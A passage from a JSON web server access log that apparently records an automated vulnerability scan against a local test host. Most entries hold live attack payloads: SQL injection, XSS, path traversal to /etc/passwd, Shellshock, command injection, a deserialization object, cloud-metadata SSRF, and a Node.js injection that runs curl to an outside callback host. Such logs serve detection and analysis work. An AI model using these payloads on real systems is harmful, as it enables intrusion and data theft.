Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mp_idx=%22;alert(%271%27);// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/12 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ImageUrl=http://ca28fg0smpvbd3qg07h0a47egu33rgi4f.oast.live&ProviderName=TheMovieDB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/29KD1usc1GB6XrI76b6oA0UEPvs.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://ca28fg0smpvbd3qg07h05pbsnbr73pwsp.oast.live\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"alibaba.interact.sh","request":"GET http://alibaba.interact.sh/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.037","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?q=node&destination=node HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oam/server/opensso/sessionservice HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/login/?next=/admin/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /opensis/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.022","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/14 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:43 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?rest_route=/whm/v3/themesettings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /node_modules/mqtt/test/helpers/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/auth/login 